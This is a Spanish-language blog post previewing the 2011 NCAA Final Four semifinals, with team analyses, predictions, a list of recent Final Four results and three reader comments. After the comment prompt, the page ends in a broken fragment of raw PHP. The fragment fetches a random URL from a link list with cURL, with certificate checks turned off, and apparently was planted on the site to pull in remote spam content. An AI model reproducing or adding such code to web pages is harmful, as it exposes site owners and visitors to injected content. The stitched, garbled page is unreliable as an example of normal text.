Final Four NCAA 2011

02 de April de 2011 por kantonyo

Después de tres semanas de competición llega el desenlace del March Madness con la disputa de la Final Four. El estadio de los Houston Texans de la National Football League (NFL), con capacidad para 70.000 personas será el escenario de lujo para la celebración de uno de los espectáculos más seguidos del año en Estados Unidos (20 millones de espectadores). El torneo de este año ha servido para conocer a futuras estrellas del baloncesto mundial. Nombres como Derrick Williams, Kemba Walker, Harrison Barnes, Kyrie Irving, Jimmer Fredette, Jared Sullinger, Jeremy Lamb, Brandon Knight o Kenneth Faried, entre otros, han demostrado que la NCAA es una inagotable fábrica de talentos. A pesar de que ha llegado uno de los mejores jugadores del torneo como Kemba Walker, una de las universidades con más pedigrí como Kentucky o los Butler Bulldogs, actual subcampeón del año pasado, la clasificación de estos cuatro equipos ha sido toda una sorpresa.

Kentucky Wildcats (4) vs Connecticut Huskies (3)

Los Wildcats llegan esta temporada a la Final Four de la mano de John Calipari (New Jersey Nets, 96-99) tras 13 años de ausencia desde que se proclamaron campeones nacionales en 1998 y en 1996, siendo también finalistas en 1997. Tras el fracaso del año pasado donde se quedaron a las puertas del Elite 8 con la mejor plantilla del torneo, este año nadie había apostado por ellos para llegar hasta donde lo han hecho. La columna vertebral de Kentucky la forman el alero de 19 años, Terrence Jones, el base de primer año, Brandon Knight (19) y el veterano pívot Josh Harrellson, de 22 años. Harrellson ha sido fundamental en el torneo ya que los Wildcats se habían quedado sin juego interior eficaz tras la suspensión administrativa del turco Enes Kanter y aunque Harrellson venía de promediar 7 puntos y 8 rebotes, su rendimiento en el torneo final ha sido muy superior: 15 puntos y 9 rebotes. Brandon Knight a pesar de su irregularidad ha demostrado que es digno sucesor de los bases que Calipari ha catapultado al baloncesto mundial en los últimos años: John Wall (10), Eric Bledsoe (10), Tyreke Evans (09) o Derrick Rose (08). Por su parte, el alero freshman Terrence Jones empezó fantásticamente la temporada encaramándose a los puestos altos del draft pero su progresión ha sido negativa quedando relegado a un segundo plano en los Wildcats promediando 10 puntos (46%) y 7 rebotes en el March Madness. El escolta DeAndre Liggins ha sido importante en las victorias contra Ohio State y North Carolina con 15 y 12 puntos respectivamente.

Por su parte, los Huskies de UConn vuelven a la Final Four una vez más de la mano de Kemba Walker como ya hicieran en el año 2009 con Hasheem Thabeet como pareja del base neoyorquino. El mediocre mes de febrero que tuvieron los Huskies, en el que acumularon un balance de 4-7, les dejó a las puertas de no clasificarse para el torneo final ya que sólo pudieron alcanzar la novena plaza de la conferencia en la regular season. Pero fue empezar la postemporada y los Huskies, de la mano siempre de Walker, dejaron en la cuneta uno a uno a los máximos favoritos y se llevaron el título frente Louisville consiguiendo la clasificación directa para el March Madness. Este punto de inflexión coincidió con la eclosión de la nueva perla de UConn, el escolta de primer año Jeremy Lamb. Kemba Walker ha promediado 27 puntos, 5 rebotes y 7 asistencias, mientras que Lamb ha conseguido 18 puntos y 3 rebotes. Los Huskies han sufrido mucho en la pintura, como se pudo ver contra Arizona donde sólo capturaron 28 rebotes frente los 39 de los Wildcats. El pívot Alex Oriakhi no está aportando lo esperado además de tener muchos problemas con las faltas perdiéndose muchos minutos. Su aportación se antoja decisiva en las aspiraciones de los Huskies.

Predicción: A pesar de que las casas de apuestas consideran a Kentucky como favorito al título, la pareja de exteriores formada por Walker y Lamb ha demostrado ser ofensivamente la más decisiva del torneo. Además, Kemba Walker es un especialista en resolver partidos en los últimos segundos y la experiencia de la plantilla de UConn en estas situaciones puede ser fundamental. Por el contrario, Josh Harrellson puede hacer añicos el juego interior de los Huskies si Alex Oriakhi sigue con su bajo rendimiento y la progresión de Brandon Knight parece ir en aumento. Apostamos por UConn para la finalísima con una gran actuación de la estrella del torneo, Kemba Walker.

Virginia Commonwealth Rams (11) vs Butler Bulldogs (8)

Los Rams de VCU han conseguido alcanzar la Final Four llegando desde la ronda preliminar en la que eliminaron a los Trojans de USC. A partir de ahí fueron sumando sorpresa tras sorpresa, eliminando a la prestigiosa Georgetown y a los siempre difíciles Boilermakers de Purdue, ambos por 18 puntos de diferencia. Más tarde en el Sweet 16 tuvieron la fortuna de vencer en la prórroga a los Seminoles de Chris Singleton y por último eliminaron a los grandes favoritos de la Universidad de Kansas por un cómodo 71-61. La Universidad de Virginia Commonwealth sólo ha nutrido a la NBA con seis jugadores, destacando los dos últimos: Eric Maynor y Larry Sanders y es la primera vez en su historia que consiguen llegar a la Final Four. El alapívot Jamie Skeen (22) fue el mejor de los Rams contra Kansas anotando 26 puntos y capturando 10 rebotes a pesar de tener en frente a los gemelos Morris. Skeen venía de hacer un discreto partido contra Florida State pero en esa ocasión el escolta de tercer año Bradford Burgess fue el mejor con 26 puntos. Los Rams han demostrado en este torneo hacer un buen baloncesto y tener una plantilla muy profunda. Una prueba de ello es el rendimiento de sus suplentes, como el caso del base senior Brandon Rozzell que cuajó una gran actuación contra los Hoyas de Georgetown en la que anotó 26 puntos. El base titular, Joey Rodriguez, es el alma de los Rams y sabe transmitir como nadie el entusiasmo y carácter que han demostrado en el torneo. El joven entrenador de 33 años, Shaka Smart ha sido también uno de los artífices del éxito de los Rams y se ha catapultado como uno de los personajes más de moda en el baloncesto americano.

Los Bulldogs vuelven a disputar la Final Four después de quedarse el año pasado a unos milímetros de la gloria tras el fallido lanzamiento de Gordon Hayward contra Duke. Este año, con la ausencia de Hayward parecía aún más difícil que consiguieran repetir la gesta del año pasado. Tras un inicio de temporada titubeante, los Bulldogs consiguieron ganar tanto la Regular Season como el torneo de la Horizon Conference. A excepción de la eliminatoria contra Wisconsin, Butler ha sufrido muchísimo para llegar, decidiendo los partidos en los últimos segundos e incluso llegando al tiempo extra como ocurrió frente Florida. Shelvin Mack ha promediado en el torneo 21 puntos (14/40 en 3p) y 3 asistencias. El alapívot Matt Howard ha dado un salto de calidad este año, mejorando bastante sus números y ha promediado en el March Madness 16 puntos y 7 rebotes. Las aspiraciones de Butler reposan en gran cantidad en estos dos jugadores, pero en los últimos partidos el alero freshman Khyle Marshall ha dado muestras de talento y se espera que sea más participativo si los Bulldogs quieren aspirar a ser campeones. Igualmente es importante la aportación que pueda hacer el pívot Andrew Smith en la pintura.

Predicción: El explosivo ritmo que ha imprimido a los partidos el conjunto de Shaka Smart le viene fatal a los Bulldogs que suelen jugar con posesiones muy largas. El duelo de banquillos entre Shaka y Brad Stevens por lo tanto será fundamental en el transcurso de esta semifinal. La plantilla de VCU es mucho más potente y profunda que la de Butler. La experiencia de Shelvin Mack y su buen manejo de los tempos es la gran baza de los Bulldogs. Apostamos por VCU para la final por su mejor forma física y por sus amplios recursos ofensivos.

Últimas Final Four

2010

Campeón: Duke Blue Devils (Kyle Singler, Nolan Smith, Jon Scheyer)
Finalistas: Butler Bulldogs (Gordon Hayward, Shelvin Mack)
Semifinalistas: Michigan State (Durrell Summer, Kalin Lucas)
Semifinalistas: West Virginia (DaSean Butler, Devin Ebanks, Kevin Jones)

2009

Campeón: North Carolina (Ty Lawson, Ed Davis, Tyler Hansbrough, Wayne Ellington)
Finalistas: Michigan State (Kalin Lucas, Goran Suton, Durrell Summers)
Semifinalistas: Connecticut (Hashem Thabet, AJ Price, Kemba Walker)
Semifinalistas: Villanova (Corey Fisher, Scottie Reynolds, Dante Cunningham)

2008

Campeón: Kansas (Darrell Arthur, Mario Chalmers, Brandon Rush)
Finalistas: Memphis (Derrick Rose, Chris Douglas-Roberts)
Semifinalistas: UCLA (Kevin Love, Russell Westbrook, Mbah a Moute, Darren Collison)
Semifinalistas: North Carolina (Tyler Hansbrough, Ty Lawson, Wayne Ellington)

2007

Campeón: Florida (Joakim Noah, Al Horford, Corey Brewer, Marreese Speights, Lee Humphrey)
Finalistas: Ohio State (Greg Oden, Mike Conley)
Semifinalistas: UCLA (Mbah a Moute, Darren Collison, Arron Afflalo, Rusell Westbrook)
Semifinalistas: Georgetown (Roy Hibbert, DaJuan Summers, Jeff Green)

Comenta

3 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Felicidades de nuevo, kantonyo. ¿Cuándo es esto?

      Citar

  2. Txusma dice:
    #2

    Hoy tenemos las semis y la noche del lunes, creo, la gran final.

    Como gane VCU va a ser histórico…

      Citar

  3. HeiNeKeN dice:
    #3

    Ganaron Butler y UCONN

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>